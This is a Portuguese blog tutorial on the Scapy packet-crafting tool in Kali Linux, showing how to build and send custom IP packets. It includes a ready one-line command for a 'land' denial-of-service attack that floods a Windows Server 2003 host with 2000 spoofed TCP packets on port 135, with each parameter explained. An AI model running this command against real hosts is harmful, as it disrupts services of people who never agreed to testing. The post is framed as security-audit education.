Scapy-uma ferramenta universal para a implementação de ataques de rede.
Petukhov Oleg, advogado de Direito Internacional e proteção de dados pessoais, especialista em informação segurança, proteção de informações e dados pessoais.
Canal do Telegram: https://t.me/protecaodaInformacao
Grupo em Telegram: https://t.me/protecaodaInformacao1
Site: https://legascom.ru
Correio eletrónico: online@legascom.ru
#segurançadaInformação #Segurançadainformação
Antes de começar a analisar os tipos de ataques de rede, gostaria de apresentar ao leitor outra ferramenta interessante e flexível que faz parte do Kali Linux, que é o Utilitário Scapy. Este utilitário flexível e funcional é escrito em Python. Este utilitário é projetado para manipular pacotes de rede. Com ele, você pode montar um pacote IP da estrutura necessária para realizar ataques de rede.
Antes de começar com o Scapy, você precisa se lembrar da estrutura do pacote IP.
Trabalhando com o Utilitário Scapy, preencheremos os campos com as informações necessárias.
Vamos começar com o Scapy.
root@kali:~# scapy
>>>
Depois de iniciar o Utilitário, o convite para digitar é ">>>". A presença deste convite indica que Scapy está em Modo Interativo e todos os comandos inseridos serão interpretados pelo utilitário.
Para começar, vamos ver a configuração atual.
>>> conf
O comando conf exibe as configurações atuais do arquivo de configuração.
Agora precisamos criar nosso próprio pacote. Como você sabe, a pilha TCP / IP em diferentes sistemas operacionais é construída de acordo com os padrões RFC, que definem a interoperabilidade da rede. No entanto, para realizar vários ataques, os pacotes criados nem sempre precisam estar totalmente em conformidade com os padrões RFC.
Em Scapy, primeiro você precisa definir as variáveis e atributos de um pacote. Assim, a variável X irá determinar o valor ttl do pacote, que é igual a 64.
>>> x=IP(ttl=64)
>>> x
Em seguida, adicione atributos adicionais ao nosso pacote. Primeiro de tudo, precisamos dos endereços do remetente e do destinatário. No exemplo abaixo, o remetente é 192.168.1.101 e o destinatário é 192.168.1.122.
>>> x.src="/192.168.1.101"
>>> x.dst="192.168.1.122"
Você pode verificar os valores atuais da variável x simplesmente especificando o nome da variável no interpretador.
>>> x
Além disso, Scapy tem muitas funções incorporadas. Você pode aprender essas funções usando o comando lsc.
>>> lsc()
Outro exemplo é o comando "send". Este comando é usado quando precisamos enviar um pacote. Como exemplo, vamos tentar enviar um pacote que criamos na variável X.
>>> send(x)
Como você pode ver, nosso pacote especialmente criado foi enviado para o endereço do destinatário. Da mesma forma, você pode especificar outros parâmetros do pacote IP, como window_size, flags, fragmentation, acknowledgement, sequence number.
Agora vamos usar o Scapy para um pequeno ataque DDoS. Digamos que você tenha um sistema de destino executando o Windows Server 2003 (curiosamente, centenas de milhares de servidores ainda executam esse sistema operacional) e esteja vulnerável a um ataque "land". Este ataque DoS consiste em enviar um grande número de pacotes com os mesmos endereços IP e portas do remetente e do destinatário. Como resultado desse ataque, a máquina não necessariamente congelará, mas a desaceleração do sistema ocorrerá necessariamente. Por exemplo, para servidores Web, esse tipo de ataque pode ser crítico.
Com o Scapy, esse ataque pode ser realizado da seguinte maneira:
>>> send(IP(src="/192.168.1.122", dst="192.168.1.122")/TCP(sport=135,dport=135), count=2000)
Neste exemplo:
send-envio do pacote;
IP-protocolo utilizado;
src="/192.168.1.122" - Fonte do pacote;
dst= "192.168.1.122" - Receptor Do pacote;
TCP - protocolo da camada de transporte;
sport = 135-porta de origem;
dport = 135-porta do destinatário;
count=2000 – o número de pacotes que queremos enviar.
Scapy não é apenas uma ferramenta para ataques de negação de serviço.
Com este utilitário, você pode construir qualquer pacote com os campos e conteúdos necessários. Portanto, eu recomendo o uso desta ferramenta na realização de auditorias de segurança da informação.
Nos próximos posts, voltaremos a considerar os ataques no nível da rede.
